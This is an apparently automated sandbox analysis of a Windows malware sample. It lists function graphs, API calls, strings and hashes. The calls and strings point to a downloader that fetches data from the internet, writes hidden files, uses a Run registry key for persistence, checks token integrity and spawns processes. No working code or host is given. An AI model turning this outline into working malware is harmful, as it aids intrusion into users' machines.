                                                                                                            control_flow_graph 18 401420-401473 GetProcessHeap HeapAlloc 19 401847-401857 call 406f60 18->19 20 401479-40147b 18->20 22 401481 20->22 23 40164e-401740 20->23 26 401487-401489 22->26 25 401744-40174d 23->25 27 401755-40176f lstrcatW 25->27 28 40174f-401753 25->28 29 401490-4014a6 call 4025b0 26->29 35 401775-401795 GetCurrentProcess OpenProcessToken 27->35 36 40183b-401841 GetProcessHeap HeapFree 27->36 28->25 33 4014c4-4014f6 call 406dd0 ExpandEnvironmentStringsW SHCreateDirectoryExW 29->33 34 4014a8-4014bd Sleep 29->34 44 401503-401528 SetFileAttributesW 33->44 45 4014f8-4014fd 33->45 34->29 37 4014bf 34->37 39 401797-4017c2 GetTokenInformation CloseHandle 35->39 40 4017c8-401823 call 401a80 call 408800 CreateProcessW 35->40 36->19 41 401632-401648 37->41 39->40 40->36 56 401825-401839 CloseHandle * 2 40->56 41->23 41->26 48 401531-401534 44->48 49 40152a-40152f 44->49 45->41 45->44 52 401536-40153b 48->52 53 40153d-401554 call 406120 48->53 51 40155a-401563 49->51 54 401569 51->54 55 40162c 51->55 52->51 53->51 58 401570-401588 54->58 55->41 56->36 60 401591-401594 58->60 61 40158a-40158f 58->61 63 401596-40159b 60->63 64 40159d-4015a8 call 406120 60->64 62 4015ad-4015c6 GetProcessHeap HeapAlloc 61->62 66 4015c8-4015de 62->66 67 401619 62->67 63->62 64->62 70 4015e0-4015e5 66->70 71 4015e7-4015ea 66->71 68 40161f-401626 67->68 68->55 68->58 72 401600-401617 GetProcessHeap HeapFree 70->72 73 4015f3-4015fb call 4069e0 71->73 74 4015ec-4015f1 71->74 72->68 73->72 74->72
                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00401460
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401463
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 004014AD
                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000104), ref: 004014E3
                                                                                                            • SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000), ref: 004014EE
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000002), ref: 00401506
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A,00000000,00000000,000000FF,?), ref: 004015B9
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004015BC
                                                                                                            • PathCombineW.SHLWAPI(00000000,?,?), ref: 004015D6
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040160E
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401611
                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 00401760
                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 00401767
                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 00401786
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040178D
                                                                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 004017B0
                                                                                                            • CloseHandle.KERNEL32(?), ref: 004017C2
                                                                                                              • Part of subcall function 004025B0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 004025E1
                                                                                                              • Part of subcall function 004025B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004025FB
                                                                                                              • Part of subcall function 004025B0: InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00402644
                                                                                                              • Part of subcall function 004025B0: GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 0040265A
                                                                                                              • Part of subcall function 004025B0: HeapAlloc.KERNEL32(00000000), ref: 0040265D
                                                                                                              • Part of subcall function 004025B0: GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 004026AA
                                                                                                              • Part of subcall function 004025B0: RtlAllocateHeap.NTDLL(00000000), ref: 004026AD
                                                                                                              • Part of subcall function 004025B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004026D7
                                                                                                              • Part of subcall function 004025B0: RtlFreeHeap.NTDLL(00000000), ref: 004026DA
                                                                                                              • Part of subcall function 004025B0: InternetCloseHandle.WININET(?), ref: 004026E6
                                                                                                              • Part of subcall function 004025B0: InternetCloseHandle.WININET(?), ref: 004026F3
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?), ref: 0040181B
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00401831
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00401839
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040183E
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401841
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$CloseHandleInternet$AllocFileFreeOpen$CreatePathToken$AllocateAttributesCombineCurrentDirectoryEnvironmentExistsExpandInformationReadSleepStringslstrcat
                                                                                                            • String ID: D$K$Pst^t$Software\Microsoft\Windows\CurrentVersion\Run$V$x
                                                                                                            • API String ID: 4228357295-1170846629
                                                                                                            • Opcode ID: 09e7c342ff7ef1e8aa6c8c2914d6a13d771e8eda33ff2520deb63734306e375f
                                                                                                            • Instruction ID: 941f8200bb5dc01e3074ee4e512f6a8a68adff5b2a31c42b6da5280b9b9f5b68
                                                                                                            • Opcode Fuzzy Hash: 09e7c342ff7ef1e8aa6c8c2914d6a13d771e8eda33ff2520deb63734306e375f
                                                                                                            • Instruction Fuzzy Hash: C6C15274901219ABDB60AFA1DC487EE77B4FF08704F50806AF545FB2A0EB789D41CB59
                                                                                                            Function 00401000 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 343memorystringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • lstrcmpA.KERNEL32(00000000,?), ref: 004010A2
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 004010C7
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004010CE
                                                                                                            • lstrlenA.KERNEL32(M1Zw0w66GQYFi), ref: 004010EC
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 0040123C
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401243
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000002), ref: 00401285
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040128C
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000047), ref: 004012E7
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004012EE
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000047), ref: 00401333
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040133A
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000047), ref: 0040137F
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401386
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000049), ref: 004013E5
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004013EC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocProcess$lstrcmplstrlen
                                                                                                            • String ID: M1Zw0w66GQYFi
                                                                                                            • API String ID: 522894340-229323296
                                                                                                            • Opcode ID: ced7a56b3a61907fb8fe41de2cd97cbfb0ca110354a1c6c8f3752cb3cf85e2ed
                                                                                                            • Instruction ID: 7eaf7544914a4b63e10803f82ca2e1c8860f16828a002309d4904a98d064a725
                                                                                                            • Opcode Fuzzy Hash: ced7a56b3a61907fb8fe41de2cd97cbfb0ca110354a1c6c8f3752cb3cf85e2ed
                                                                                                            • Instruction Fuzzy Hash: 69D1E571C041659FDB14CFA9C8946FABBF4AF1D310F1881BAE895A7342D6389A05CBA4
                                                                                                            Function 004025B0 Relevance: 19.6, APIs: 13, Instructions: 108memorynetworkfileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 004025E1
                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004025FB
                                                                                                            • InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00402644
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 0040265A
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040265D
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,0000000100000000), ref: 00402668
                                                                                                            • RtlReAllocateHeap.NTDLL(00000000), ref: 0040266B
                                                                                                            • GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 004026AA
                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 004026AD
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004026D7
                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 004026DA
                                                                                                            • InternetCloseHandle.WININET(?), ref: 004026E6
                                                                                                            • InternetCloseHandle.WININET(?), ref: 004026F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Internet$Process$AllocateCloseHandleOpen$AllocFileFreeRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1681177425-0
                                                                                                            • Opcode ID: 99fa4245f036d7ca7f0a99e565945882106ecdf69a0e089de33d57685f3b7670
                                                                                                            • Instruction ID: 279d8a5f81a2e8e77284af958758153dca1b73d3fdef49649256d379fc70e3f9
                                                                                                            • Opcode Fuzzy Hash: 99fa4245f036d7ca7f0a99e565945882106ecdf69a0e089de33d57685f3b7670
                                                                                                            • Instruction Fuzzy Hash: 41312F71900119ABDB609B65DC4DF9ABBBCFF85714F00C1A5F548A2290DE709E85CFA4
                                                                                                            Function 004069E0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 330filetimeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 136 4069e0-4069ff 137 406a01-406a0b 136->137 138 406a54-406a63 136->138 137->138 141 406a0d-406a12 137->141 139 406a65-406a7a call 406f60 138->139 140 406a7d-406a80 138->140 142 406a82-406a84 140->142 143 406ab8-406abd 140->143 141->138 145 406a14-406a18 141->145 142->143 146 406a86-406ab5 call 405540 142->146 147 406b13-406b30 call 406120 143->147 148 406abf 143->148 150 406a23-406a2d 145->150 151 406a1a-406a20 call 40c52b 145->151 146->143 165 406b32-406b35 147->165 166 406b6e-406b7e 147->166 157 406ac0-406ac2 148->157 154 406a37-406a4d call 40c52b 150->154 155 406a2f-406a32 call 4047e0 150->155 151->150 154->138 155->154 163 406ac4-406ac8 157->163 164 406b0c-406b11 157->164 163->164 168 406aca-406ad1 163->168 164->147 164->157 169 406b50 165->169 170 406b37-406b3a 165->170 172 406b80-406b84 166->172 173 406b9e-406bb5 call 40a23b 166->173 168->164 171 406ad3-406b09 call 405540 168->171 176 406b52-406b6b call 406830 call 406f60 169->176 170->169 174 406b3c-406b3f 170->174 171->164 178 406b91-406b94 172->178 179 406b86-406b8a 172->179 187 406bc2-406bce 173->187 188 406bb7-406bc0 173->188 182 406b41-406b46 174->182 183 406b48-406b4e 174->183 181 406b96-406b9c 178->181 179->178 180 406b8c-406b8f 179->180 180->181 181->172 181->173 182->169 182->183 183->176 191 406dc4-406dc9 call 407097 187->191 192 406bd4-406be9 187->192 190 406c00-406c23 call 4027b0 188->190 205 406c43-406c79 call 406830 CreateFileW 190->205 194 406c25-406c41 call 4027b0 192->194 195 406beb-406bef 192->195 194->205 195->194 200 406bf1-406bf4 195->200 200->190 204 406bf6-406bfe 200->204 204->190 204->194 208 406c93-406ca7 call 405b70 205->208 209 406c7b-406c90 call 406f60 205->209 214 406ca9-406cb6 call 4071b0 208->214 215 406cbc-406cbe 208->215 214->215 217 406cc0-406ce1 call 405d40 215->217 221 406d23 217->221 222 406ce3-406ce5 217->222 225 406d28-406d2c 221->225 223 406d15-406d1a 222->223 224 406ce7 222->224 223->225 226 406d09-406d0f 224->226 227 406ce9-406d07 WriteFile 224->227 228 406d2e-406d33 225->228 229 406d6f-406d71 225->229 226->225 231 406d11-406d13 226->231 227->226 230 406d1c-406d21 227->230 228->229 234 406d35-406d39 228->234 232 406da1-406dc1 CloseHandle call 406f60 229->232 233 406d73-406d96 SetFileTime CloseHandle 229->233 230->225 231->217 231->223 233->232 236 406d44-406d4e 234->236 237 406d3b-406d41 call 40c52b 234->237 238 406d50-406d53 call 4047e0 236->238 239 406d58-406d68 call 40c52b 236->239 237->236 238->239 239->229
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,00000000,00000000,00000000), ref: 00406C6A
                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00406CFF
                                                                                                            • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00406D8F
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00406D96
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00406DA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseHandle$CreateTimeWrite
                                                                                                            • String ID: %s%s$%s%s%s$:
                                                                                                            • API String ID: 3400595745-3034790606
                                                                                                            • Opcode ID: 98c9b71b694020488306e050b8bcd48454193dd243e4d79f583766080529faf7
                                                                                                            • Instruction ID: 5c485409a167992925fbe071c51fea0c94dd585c77c72435f2c53fcfd623a355
                                                                                                            • Opcode Fuzzy Hash: 98c9b71b694020488306e050b8bcd48454193dd243e4d79f583766080529faf7
                                                                                                            • Instruction Fuzzy Hash: 89B1C2716006159BDB20EF24C885BABB3B4EF04314F01057FE95BB72C1D738A9A4CB98
                                                                                                            Function 00406830 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 194COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 246 406830-40684b 247 4068d1-4068d7 246->247 248 406851-40686f call 40a23b 246->248 249 4069c1-4069d0 call 406f60 247->249 250 4068dd-4068e2 247->250 258 406870-406879 248->258 252 4068e4-4068e8 250->252 255 4068f0 252->255 256 4068ea-4068ee 252->256 259 4068f2-4068fe 255->259 256->255 256->259 258->258 260 40687b-40687f 258->260 259->252 261 406900-406902 259->261 262 4068b0-4068c0 GetFileAttributesW 260->262 263 406881-40688c 260->263 264 406904-406920 call 409c70 261->264 265 40693d-406949 261->265 262->247 268 4068c2-4068cb CreateDirectoryW 262->268 266 406893-4068a0 263->266 267 40688e-406891 263->267 272 4069d1-4069ff call 407097 264->272 279 406926-406938 call 406830 264->279 270 406960-40696f 265->270 271 40694b-40695d call 40a23b 265->271 266->272 273 4068a6-4068a8 266->273 267->262 267->266 268->247 274 406970-406979 270->274 271->270 286 406a01-406a0b 272->286 287 406a54-406a63 272->287 273->262 274->274 278 40697b-4069b0 call 40a23b GetFileAttributesW 274->278 278->249 288 4069b2-4069bb CreateDirectoryW 278->288 279->265 286->287 291 406a0d-406a12 286->291 289 406a65-406a7a call 406f60 287->289 290 406a7d-406a80 287->290 288->249 292 406a82-406a84 290->292 293 406ab8-406abd 290->293 291->287 295 406a14-406a18 291->295 292->293 296 406a86-406ab5 call 405540 292->296 297 406b13-406b30 call 406120 293->297 298 406abf 293->298 300 406a23-406a2d 295->300 301 406a1a-406a20 call 40c52b 295->301 296->293 315 406b32-406b35 297->315 316 406b6e-406b7e 297->316 307 406ac0-406ac2 298->307 304 406a37-406a4d call 40c52b 300->304 305 406a2f-406a32 call 4047e0 300->305 301->300 304->287 305->304 313 406ac4-406ac8 307->313 314 406b0c-406b11 307->314 313->314 318 406aca-406ad1 313->318 314->297 314->307 319 406b50 315->319 320 406b37-406b3a 315->320 322 406b80-406b84 316->322 323 406b9e-406bb5 call 40a23b 316->323 318->314 321 406ad3-406b09 call 405540 318->321 326 406b52-406b6b call 406830 call 406f60 319->326 320->319 324 406b3c-406b3f 320->324 321->314 328 406b91-406b94 322->328 329 406b86-406b8a 322->329 337 406bc2-406bce 323->337 338 406bb7-406bc0 323->338 332 406b41-406b46 324->332 333 406b48-406b4e 324->333 331 406b96-406b9c 328->331 329->328 330 406b8c-406b8f 329->330 330->331 331->322 331->323 332->319 332->333 333->326 341 406dc4-406dc9 call 407097 337->341 342 406bd4-406be9 337->342 340 406c00-406c23 call 4027b0 338->340 355 406c43-406c79 call 406830 CreateFileW 340->355 344 406c25-406c41 call 4027b0 342->344 345 406beb-406bef 342->345 344->355 345->344 350 406bf1-406bf4 345->350 350->340 354 406bf6-406bfe 350->354 354->340 354->344 358 406c93-406ca7 call 405b70 355->358 359 406c7b-406c90 call 406f60 355->359 364 406ca9-406cb6 call 4071b0 358->364 365 406cbc-406cbe 358->365 364->365 367 406cc0-406ce1 call 405d40 365->367 371 406d23 367->371 372 406ce3-406ce5 367->372 375 406d28-406d2c 371->375 373 406d15-406d1a 372->373 374 406ce7 372->374 373->375 376 406d09-406d0f 374->376 377 406ce9-406d07 WriteFile 374->377 378 406d2e-406d33 375->378 379 406d6f-406d71 375->379 376->375 381 406d11-406d13 376->381 377->376 380 406d1c-406d21 377->380 378->379 384 406d35-406d39 378->384 382 406da1-406dc1 CloseHandle call 406f60 379->382 383 406d73-406d96 SetFileTime CloseHandle 379->383 380->375 381->367 381->373 383->382 386 406d44-406d4e 384->386 387 406d3b-406d41 call 40c52b 384->387 388 406d50-406d53 call 4047e0 386->388 389 406d58-406d68 call 40c52b 386->389 387->386 388->389 389->379
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 004068B7
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 004068CB
                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 004069A7
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 004069BB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesCreateDirectoryFile
                                                                                                            • String ID: Pl@
                                                                                                            • API String ID: 3401506121-745116313
                                                                                                            • Opcode ID: 2f29e6726891c44616fa55043902484a068493e373541bd7c6d0d08ede89516c
                                                                                                            • Instruction ID: ec1f5b360a55acec7d882f1d6c8891c8c9af4486f23bb7fef10e4ffc5149fcb3
                                                                                                            • Opcode Fuzzy Hash: 2f29e6726891c44616fa55043902484a068493e373541bd7c6d0d08ede89516c
                                                                                                            • Instruction Fuzzy Hash: 4451FAB190021857CB20EF69D885AEBB3A8EF44310F15467FE916E72C1EB349E64CB59
                                                                                                            Function 00402710 Relevance: 4.6, APIs: 3, Instructions: 53synchronizationCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 396 402710-402727 call 401000 399 402785-402788 396->399 400 402729-402742 CreateMutexW GetLastError 396->400 401 402744-402749 400->401 402 40277d-40277f ExitProcess 400->402 403 402754-402765 call 401420 401->403 404 40274b-402752 call 4024b0 401->404 408 40276a-402772 403->408 404->403 409 40278b-402790 call 402520 404->409 408->402 410 402774-402778 call 401860 408->410 410->402
                                                                                                            APIs
                                                                                                              • Part of subcall function 00401000: lstrcmpA.KERNEL32(00000000,?), ref: 004010A2
                                                                                                              • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000008,?), ref: 004010C7
                                                                                                              • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000), ref: 004010CE
                                                                                                              • Part of subcall function 00401000: lstrlenA.KERNEL32(M1Zw0w66GQYFi), ref: 004010EC
                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00402731
                                                                                                            • GetLastError.KERNEL32 ref: 00402737
                                                                                                            • ExitProcess.KERNEL32 ref: 0040277F
                                                                                                              • Part of subcall function 004024B0: GetCurrentProcess.KERNEL32(00000008,?), ref: 004024CC
                                                                                                              • Part of subcall function 004024B0: OpenProcessToken.ADVAPI32(00000000), ref: 004024D3
                                                                                                              • Part of subcall function 004024B0: GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 004024F3
                                                                                                              • Part of subcall function 004024B0: CloseHandle.KERNEL32(?), ref: 00402502
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$HeapToken$AllocCloseCreateCurrentErrorExitHandleInformationLastMutexOpenlstrcmplstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2480484397-0
                                                                                                            • Opcode ID: 7ed43953da3f1d17e2b94cd265ab11a27986ec2db529bb376a53c88e9eace196
                                                                                                            • Instruction ID: cabc20e52d63fbaf5835a872110fa228d1b8c25b3e59d728fc3075fda0be40b5
                                                                                                            • Opcode Fuzzy Hash: 7ed43953da3f1d17e2b94cd265ab11a27986ec2db529bb376a53c88e9eace196
                                                                                                            • Instruction Fuzzy Hash: BD01D6301083019BDB14AF51DD0DB6EB791AF84345F00893EF994621E0EBB88954C7AB
                                                                                                            Function 0040D8F2 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 414 40d8f2-40d8fd 415 40d90b-40d911 414->415 416 40d8ff-40d909 414->416 418 40d913-40d914 415->418 419 40d92a-40d93b RtlAllocateHeap 415->419 416->415 417 40d93f-40d94a call 40dc32 416->417 424 40d94c-40d94e 417->424 418->419 420 40d916-40d91d call 40d247 419->420 421 40d93d 419->421 420->417 427 40d91f-40d928 call 40c57b 420->427 421->424 427->417 427->419
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,7591F380,00000000,?,0040F219,00000001,00000364,00000000,00000006,000000FF,?,0040718C,00000000,?,00406E07,0000044C), ref: 0040D933
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 0e19913d1ecff6e60680035eae04c32c323cb32b047577f130201fc95c97fb0b
                                                                                                            • Instruction ID: 3b163e85c33e1a3503c65bd554a4f98c0f2ee5239ac5b29bff1cde8fd44bdab8
                                                                                                            • Opcode Fuzzy Hash: 0e19913d1ecff6e60680035eae04c32c323cb32b047577f130201fc95c97fb0b
                                                                                                            • Instruction Fuzzy Hash: F0F0B472E01124A6DB225EE29C05B6B3B58AF81760B148177E804B72D4CA38DD0986AC
                                                                                                            Function 0040DC7F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 430 40dc7f-40dc8b 431 40dcbd-40dcc8 call 40dc32 430->431 432 40dc8d-40dc8f 430->432 439 40dcca-40dccc 431->439 434 40dc91-40dc92 432->434 435 40dca8-40dcb9 RtlAllocateHeap 432->435 434->435 436 40dc94-40dc9b call 40d247 435->436 437 40dcbb 435->437 436->431 442 40dc9d-40dca6 call 40c57b 436->442 437->439 442->431 442->435
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,0040718C,00000000,?,00406E07,0000044C,A2C859C2,7591F380,00000000,00000000,000000FF,?,004014D5), ref: 0040DCB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 03c37d2a1fd8ff6a03587279802e86b92029074b3fd401b0eb709b4195d61d0d
                                                                                                            • Instruction ID: 1c94c52fd2da5dd860f1ac26d2e848129022307c2b84a0b6717adfd0f47dcc89
                                                                                                            • Opcode Fuzzy Hash: 03c37d2a1fd8ff6a03587279802e86b92029074b3fd401b0eb709b4195d61d0d
                                                                                                            • Instruction Fuzzy Hash: F5E06531D4822457FA2137EA9C04B5B7A589F417B4F150177EC16B62D0CBBCDC0AC1AD

                                                                                                            Non-executed Functions

                                                                                                            Function 00412340 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ee952e25a22fe5600719e129e6a69d76954a32707930552934fc297b8667f3ce
                                                                                                            • Instruction ID: 6d4369275cd833c3962ce4f0f9f5d870733270a8750b4c026c80256ecd2f67c0
                                                                                                            • Opcode Fuzzy Hash: ee952e25a22fe5600719e129e6a69d76954a32707930552934fc297b8667f3ce
                                                                                                            • Instruction Fuzzy Hash: 26024D71E002199BDF14CFA9CA806EEFBB1FF48314F24826AD519E7380D775A991CB94
                                                                                                            Function 00407884 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00407890
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0040795C
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407975
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0040797F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                            • String ID:
                                                                                                            • API String ID: 254469556-0
                                                                                                            • Opcode ID: 02910537eba6cd405f4cd1a7db5889c65aee9def55af4774f4fbecb6b8f9ad63
                                                                                                            • Instruction ID: eade7b54685adbf1ecf20fd789ded79bced50c1eba4a3a40bacbfb91bb774348
                                                                                                            • Opcode Fuzzy Hash: 02910537eba6cd405f4cd1a7db5889c65aee9def55af4774f4fbecb6b8f9ad63
                                                                                                            • Instruction Fuzzy Hash: 0031FA75D052189BDF20EF65D949BCDBBB8AF08304F1041AAE40DA7290EB749B84CF49
                                                                                                            Function 0040D978 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0040DA70
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040DA7A
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040DA87
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
